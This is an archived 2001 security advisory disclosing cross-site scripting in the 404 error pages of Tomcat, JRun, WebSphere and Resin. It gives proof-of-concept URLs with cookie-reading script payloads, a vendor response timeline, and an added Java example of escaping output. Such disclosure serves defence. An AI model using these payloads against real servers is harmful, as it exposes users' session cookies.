Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability

2001-07-03T00:00:00
ID SECURITYVULNS:DOC:1801
Type securityvulns
Reporter Securityvulns
Modified 2001-07-03T00:00:00

Description

Affected products:

Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
  <http://jakarta.apache.org/tomcat/>
JRun 3.0
  <http://www.allaire.com/products/jrun/index.cfm>
WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
  <http://www-4.ibm.com/software/webservers/>
Resin
  <http://www.caucho.com/products/resin/>

Not affected:

Unknown

Problem:

When the following URLs are accessed, the JavaScript code embedded in them is executed in the browser in the server's domain.

Tomcat 3.2.1:
  http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
JRun 3.0:
  http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
  http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
WebSphere 3.5 FP2:
  http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
WebSphere 3.02:
  http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
VisualAge for Java 3.5 Professional:
  http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
Resin 1.2.2:
  http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

These pages produce output like this:
=================================================
Error 404
An error has occurred while processing request:
http://WebSphere/webapp/examples/**

Message: File not found: //**
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //*
        at javax.servlet.ServletException.<init>(ServletException.java:107)
        at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
        at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
        at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
        ...
=================================================
***: The JavaScript code is executed here.

This vulnerability is quite similar to "IIS cross-site scripting vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000. <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>

Impact:

For details about cross-site scripting, see the following pages:
  <http://www.cert.org/advisories/CA-2000-02.html>
  <http://www.microsoft.com/TechNet/security/crssite.asp>
  <http://www.apache.org/info/css-security/>

Vendor status:

Tomcat:
======
  Notified: 16 Mar 2001 04:32:02 +0900, I-found-a-security-problem-in-the-apache-source-code@apache.org
            17 Mar 2001 18:55:45 +0900, tomcat-dev@jakarta.apache.org
  Response: 17 Mar 2001 20:07:42 -0000
  Fix: 30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
       11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
  Announcement: <http://jakarta.apache.org/tomcat/news.html>

  Sun Microsystems does not publish Tomcat vulnerabilities.
  <http://java.sun.com/products/jsp/tomcat/>
  <http://java.sun.com/sfaq/chronology.html>

JRun:
====
  Notified: 13 Mar 2001 23:11:54 +0900, secure@allaire.com
  Response: 13 Mar 2001 09:43:49 -0500
            14 Mar 2001 09:05:03 -0500
  Fix: 28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
  Announcement: <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
    Macromedia Product Security Bulletin (MPSB01-06)
    JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
    (a.k.a. JavaScript code execution vulnerability)

WebSphere:
=========
  Notified: 20 Mar 2001 08:13:30 +0900, *@us.ibm.com
  Response: 22 Mar 2001 09:14:01 -0500
            23 Mar 2001 00:02:58 +0900
  Fix: PQ47386V302x (?)
    <http://www-4.ibm.com/software/webservers/appserv/efix.html>
  Announcement:
    <http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
    (in Japanese)

Resin:
=====
  Notified: 16 Mar 2001 02:26:47 +0900, bugs@caucho.com, resin@caucho.com
  Response: None
  Fix: Unknown
  Announcement: Unknown
    http://www.caucho.com/products/resin/changes.xtp

Workaround:

Customize error pages.
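
What a customized error page has to do differently, shown as an added example that is not part of the original advisory or of any vendor's code: the requested path is HTML-escaped before it is written into the 404 body, and no stack trace is echoed. The class and method names (ErrorPageDemo, escapeHtml, renderDefault404, renderCustom404) are hypothetical, and the request path is a constructed sample modelled on the URLs listed above.

```java
// Added illustration, not code from any of the affected containers.
// ErrorPageDemo, escapeHtml and the render* methods are hypothetical names.
public class ErrorPageDemo {

    // Replace the five characters that can change the HTML parsing context.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Behaviour the advisory describes: the requested path is copied
    // into the 404 body unchanged, so markup in the path becomes markup.
    static String renderDefault404(String requestUri) {
        return "<html><body><h1>Error 404</h1>\n"
             + "<p>File not found: " + requestUri + "</p></body></html>";
    }

    // Custom error page: the path is emitted as text only, and the
    // stack trace shown in the default output is left out.
    static String renderCustom404(String requestUri) {
        return "<html><body><h1>Error 404</h1>\n"
             + "<p>File not found: " + escapeHtml(requestUri) + "</p></body></html>";
    }

    public static void main(String[] args) {
        // Constructed sample input, modelled on the URLs in the advisory.
        String uri = "/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>";
        String before = renderDefault404(uri);
        String after = renderCustom404(uri);
        System.out.println("default page has raw <SCRIPT>: " + before.contains("<SCRIPT>"));
        System.out.println("custom page has raw <SCRIPT>:  " + after.contains("<SCRIPT>"));
        System.out.println(after);
    }
}
```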

--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/